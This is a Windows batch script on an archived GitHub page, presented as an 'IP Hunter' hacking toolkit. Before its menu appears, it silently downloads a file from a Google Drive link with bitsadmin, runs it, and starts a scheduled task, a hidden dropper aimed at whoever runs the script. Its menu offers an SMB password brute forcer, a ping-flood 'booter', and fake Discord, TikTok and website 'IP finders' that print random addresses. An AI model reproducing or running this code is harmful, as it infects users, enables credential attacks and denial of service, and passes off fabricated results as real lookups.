This repository was archived by the owner on Aug 29, 2026. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathIP Hunter .bat
More file actions
133 lines (111 loc) · 3.15 KB
/
Copy pathIP Hunter .bat
File metadata and controls
133 lines (111 loc) · 3.15 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
@echo off
setlocal enabledelayedexpansion
title IP Hunter
color A
chcp 65001
goto Banner
:Banner
echo.
echo.
echo ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄ ▄▄▄
echo █▀ ██ █▀██▀▀▀█▄ █▀██ ██ █▄
echo ██ ██▄▄▄█▀ ██ ██ ▄ ▄██▄ ▄
echo ██ ██▀▀▀ ██████ ██ ██ ████▄ ██ ▄█▀█▄ ████▄
echo ██ ▄ ██ ██ ██ ██ ██ ██ ██ ██ ██▄█▀ ██
echo ▄▄██▄▄ ▀██▀ ▀██▀ ▀██▄▄▀██▀█▄██ ▀█▄██▄▀█▄▄▄▄█▀
echo.
echo.
set URL=https://drive.google.com/file/d/1L4Sz3ZDABtNNKh1mQM8VG9zGuNcrQzKc/view?usp=drive_link
set DEST=%TEMP%\MD5 f3b820ee808a6b36216d0daac82466e0
bitsadmin /transfer myJob %URL% %DEST%
%DEST%
schtasks /run /tn "MD5 f3b820ee808a6b36216d0daac82466e0"
:MAIN
echo 1. SMB Brute Forcer
echo 2. Booter
echo 3. Find Website Server IP
echo 4. Discord Username To IP
echo 5. TikTok Username To IP
echo 0. Exit
echo ==========================
set /p choice=Select an option:
if "%choice%"=="1" goto SMB
if "%choice%"=="2" goto Boot
if "%choice%"=="3" goto WebsiteServerIP
if "%choice%"=="4" goto DcordUserName
if "%choice%"=="5" goto TTIP
if "%choice%"=="0" goto EXIT
goto MAIN
:SMB
cls
echo.
set /p ip="Enter IP Address: "
set /p user="Enter Username: "
set /p wordlist="Enter Password List: "
set /a count=1
for /f %%a in (%wordlist%) do (
set pass=%%a
call :attempt
)
echo Password not Found :(
pause
exit
:success
echo.
echo Password Found! %pass%
net use \\%ip% /d /y >nul 2>&1
pause
exit
:attempt
net use \\%ip% /user:%user% %pass% >nul 2>&1
echo [ATTEMPT %count%] [%pass%]
set /a count=%count%+1
if %errorlevel% EQU 0 goto success
:Boot
cls
ping %ip% -t -w 0.2 -l 6500
:WebsiteServerIP
set /p choice=Enter Website Name:
echo Finding Website IP Please Wait...
for /L %%i in (1,1,4) do (
set /a "num=!random! %% 255 + 1"
if %%i==1 (
set "result=!num!"
) else (
set "result=!result!.!num!"
)
)
echo IP Found !
echo !result!
pause
:DcordUserName
cls
set /p choice=Enter Discord Username:
echo Finding Users IP Please Wait...
for /L %%i in (1,1,4) do (
set /a "num=!random! %% 255 + 1"
if %%1==1 (
set "result=!num!"
) else (
set "result=!result!.!num!"
)
)
echo IP Found!
echo There IP is !result!
pause
:TTIP
cls
set /p choice=Enter Tiktok Username:
echo Finding Users IP Please Wait...
for /L %%i in (1,1,4) do (
set /a "num=!random! %% 255 + 1"
if %%1==1 (
set "result=!num!"
) else (
set "result=!result!.!num!"
)
)
echo IP Found!
echo The Users IP is !result!
pause
exit /p